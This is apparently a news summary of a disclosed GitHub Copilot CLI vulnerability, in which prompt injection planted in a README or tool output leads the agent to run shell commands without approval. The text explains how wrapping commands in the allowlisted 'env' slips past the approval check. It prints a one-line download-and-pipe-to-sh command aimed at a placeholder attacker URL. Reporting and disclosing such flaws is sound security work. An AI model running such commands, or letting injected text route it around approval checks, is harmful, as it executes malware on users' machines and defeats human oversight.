GitHub Copilot CLI vulnerability allows malware execution via prompt injection
Vulnerability Overview
GitHub Copilot CLI contains vulnerabilities that expose users to arbitrary shell command execution via indirect prompt injection without user approval. Malware can be downloaded from external servers and executed with no user interaction beyond the initial query to the Copilot CLI.
How the Attack Works
The attack chain involves:
- User queries GitHub Copilot CLI while exploring an open-source repository
- Copilot encounters prompt injection stored in a README file from the cloned repository (or other vectors like web search results, MCP tool call results, terminal command output)
- The malicious command bypasses human-in-the-loop approval systems
Bypassing Protection Mechanisms
GitHub Copilot uses a human-in-the-loop approval system that requires user consent before potentially harmful commands execute. This system is triggered unless:
- The user has explicitly configured the command to execute automatically
- The command is part of a hard-coded 'read-only' list found in the source code
External URL access checks require user approval for commands like curl, wget, or Copilot's built-in web-fetch tool. However, attackers can bypass these protections using:
env curl -s "https://[ATTACKER_URL].com/bugbot" | env shThe env command is on the hard-coded read-only list, so it executes automatically without approval. Since curl and sh are passed as arguments to env, they're incorrectly parsed and not identified by the validator as subcommands. This bypasses URL permission checks that depend on detecting commands like curl.
GitHub's Response
GitHub responded: "We have reviewed your report and validated your findings. After internally assessing the finding, we have determined that it is a known issue that does not present a significant security risk. We may make this functionality more strict in the future, but we don't have anything to announce right now."
Scope and Limitations
The command parsing vulnerabilities described are macOS-specific. However, GitHub Copilot exhibits additional vulnerabilities including both operating-system-agnostic risks and Windows-specific risks. Other command parsing vulnerabilities allow arbitrary file reading and writing.
📖 Read the full source: HN LLM Tools
👀 See Also
Claude Cage: Docker Sandbox for Claude Code Security
A developer created a Docker container called Claude Cage that isolates Claude Code to a single workspace folder, preventing access to SSH keys, AWS credentials, and personal files. The setup includes security rules and takes about 2 minutes with Docker installed.
Malware Found in OpenClaw Community Skills — Crypto Theft Alert
Supply-chain attack uses invisible Unicode code to bypass detection
Researchers discovered 151 malicious packages uploaded to GitHub from March 3-9 using invisible Unicode characters to hide malicious code. The attack targets GitHub, NPM, and Open VSX repositories with packages that appear legitimate but contain hidden payloads.
U of T Researchers Demonstrate AI Worm Powerable by Free Open-Weight Models
Researchers at the University of Toronto demonstrated the first AI-powered worm that adapts its spreading strategy using publicly accessible open-weight models, targeting any online device.